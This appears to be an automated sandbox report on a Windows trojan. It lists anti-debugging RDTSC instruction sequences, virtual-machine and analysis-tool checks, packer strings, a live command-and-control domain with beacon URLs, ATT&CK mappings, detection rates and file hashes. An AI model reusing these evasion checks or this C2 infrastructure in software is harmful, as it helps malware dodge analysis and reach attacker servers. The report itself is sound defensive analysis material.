Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20583 second address: 6E205F2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B98E54831h 0x00000008 adc si, 89F6h 0x0000000d jmp 00007F7B98E54831h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 pushfd 0x00000017 jmp 00007F7B98E54837h 0x0000001c sub esi, 0E255F2Eh 0x00000022 jmp 00007F7B98E54839h 0x00000027 popfd 0x00000028 pop eax 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E205F2 second address: 6E205F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E205F6 second address: 6E2060E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E2060E second address: 6E20657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7B99161524h 0x00000011 xor ecx, 1A35C238h 0x00000017 jmp 00007F7B9916151Bh 0x0000001c popfd 0x0000001d mov ah, 40h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edx, 1AA3BAB2h 0x00000029 mov bx, CFFEh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20657 second address: 6E206C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B98E54838h 0x00000013 adc eax, 101466F8h 0x00000019 jmp 00007F7B98E5482Bh 0x0000001e popfd 0x0000001f mov ax, 742Fh 0x00000023 popad 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx ebx, si 0x0000002d pushfd 0x0000002e jmp 00007F7B98E54838h 0x00000033 adc esi, 29E13088h 0x00000039 jmp 00007F7B98E5482Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E206C9 second address: 6E20781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F7B99161520h 0x0000000c or ecx, 26DF92E8h 0x00000012 jmp 00007F7B9916151Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b sub ecx, ecx 0x0000001d jmp 00007F7B9916151Fh 0x00000022 xchg eax, edi 0x00000023 jmp 00007F7B99161526h 0x00000028 push eax 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7B99161521h 0x00000030 sbb al, 00000066h 0x00000033 jmp 00007F7B99161521h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F7B99161520h 0x0000003f adc ax, DA08h 0x00000044 jmp 00007F7B9916151Bh 0x00000049 popfd 0x0000004a popad 0x0000004b xchg eax, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F7B99161525h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20781 second address: 6E207E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B98E54837h 0x00000008 mov esi, 057B714Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, 00000001h 0x00000015 jmp 00007F7B98E54832h 0x0000001a lock cmpxchg dword ptr [esi], ecx 0x0000001e jmp 00007F7B98E54830h 0x00000023 mov ecx, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7B98E54837h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E207E9 second address: 6E2084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B9916151Fh 0x00000009 adc ecx, 69ABCB1Eh 0x0000000f jmp 00007F7B99161529h 0x00000014 popfd 0x00000015 jmp 00007F7B99161520h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp ecx, 01h 0x00000020 pushad 0x00000021 mov bl, F3h 0x00000023 popad 0x00000024 jne 00007F7C096932AEh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F7B9916151Eh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E2084E second address: 6E20852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20852 second address: 6E20858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20858 second address: 6E208C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov ch, dh 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 call 00007F7B98E54832h 0x00000015 mov ah, CCh 0x00000017 pop edx 0x00000018 push ecx 0x00000019 pushfd 0x0000001a jmp 00007F7B98E54833h 0x0000001f or esi, 4B2A4D4Eh 0x00000025 jmp 00007F7B98E54839h 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208C4 second address: 6E208C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208C8 second address: 6E208CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E208CE second address: 6E20907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161521h 0x00000009 add cx, 1836h 0x0000000e jmp 00007F7B99161521h 0x00000013 popfd 0x00000014 mov edi, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20907 second address: 6E2090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exe Special instruction interceptor: First address: 181C2E6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exe Special instruction interceptor: First address: 181AE6F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exe Special instruction interceptor: First address: 165F0A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exe Special instruction interceptor: First address: 1661B04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exe Special instruction interceptor: First address: 18A28A5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\lolvgcpX19.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\lolvgcpX19.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\lolvgcpX19.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_01169980 rdtsc 0_2_01169980
Source: C:\Users\user\Desktop\lolvgcpX19.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: lolvgcpX19.exe, 00000000.00000003.2200351560.0000000000661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: lolvgcpX19.exe Binary or memory string: Hyper-V RAW
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: lolvgcpX19.exe, 00000000.00000003.2294457217.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294618317.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294486811.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311467990.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294224463.00000000006B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8N15
Source: lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\lolvgcpX19.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\lolvgcpX19.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\lolvgcpX19.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\lolvgcpX19.exe File opened: NTICE
Source: C:\Users\user\Desktop\lolvgcpX19.exe File opened: SICE
Source: C:\Users\user\Desktop\lolvgcpX19.exe File opened: SIWVID
Source: C:\Users\user\Desktop\lolvgcpX19.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\lolvgcpX19.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\lolvgcpX19.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_01169980 rdtsc 0_2_01169980
Source: C:\Users\user\Desktop\lolvgcpX19.exe Code function: 0_2_00F9C6F0 LdrInitializeThunk,0_2_00F9C6F0
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\lolvgcpX19.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\lolvgcpX19.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.6:49710 -> 5.101.3.217:80

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| lolvgcpX19.exe | 43% | Virustotal | |
| lolvgcpX19.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
| lolvgcpX19.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| lolvgcpX19.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3 | 0% | Avira URL Cloud | safe |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| home.fiveth5ht.top | 5.101.3.217 | true | false | | high |
| httpbin.org | 3.218.7.103 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown |
| https://httpbin.org/ip | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://curl.se/docs/hsts.html | lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
| http://html4/loose.dtd | lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://httpbin.org/ipbefore | lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html | lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://curl.se/docs/hsts.html# | lolvgcpX19.exe | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3 | lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
| https://curl.se/docs/alt-svc.html | lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://.css | lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://.jpg | lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false |
| 3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false |

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1581218
                        Start date and time:2024-12-27 08:45:23 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:lolvgcpX19.exe
                        renamed because original name is a hash value
                        Original Sample Name:605f4d4c3e2be9f71fe0974b6ce3c714.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.981996150461257
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:lolvgcpX19.exe
                            File size:4'502'528 bytes
                            MD5:605f4d4c3e2be9f71fe0974b6ce3c714
                            SHA1:b361107308ff54acebd2221648551ea4ea60d679
                            SHA256:f455531a6a17ac4c13070b4dc22758990ec5c31dfb80f4a4f914745f66da3d2f
                            SHA512:d1181b2fa61e2c6c9b908bb5c9cd24376f286dbabc9c916527501fae981be4d7f735c6dcbd9e6bcc7dce586d0993a45fc8d84dc156bc16f5360e1b2197d57e49
                            SSDEEP:98304:rlU+ho/skYnTALFT52S0X5Uy5TOiTdoCiJjHgA82r6rQdu3fkF:rlL1kYcLv0XVRoCW866r6uPkF
                            TLSH:8126337C0F95B604CEADAC3CB6C772903C174AA2CF2DF598A96A84A3F9475D7C55E080
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@..........................@......".D...@... ............................
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x1041000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:
                                Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc3fabc | 0x10 | ywbalksd
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3fa6c | 0x18 | ywbalksd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x6db000 | 0x288a00 | feb0757c8d5c6755639f6a3ea736ced6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | d755cb7ca107f9f9e03e78d6958a6abd | False | 0.58203125 | data | 4.554761189306271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x6de000 | 0x3a3000 | 0x200 | 947726a68a29291ed6d7def0e9efbdff | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
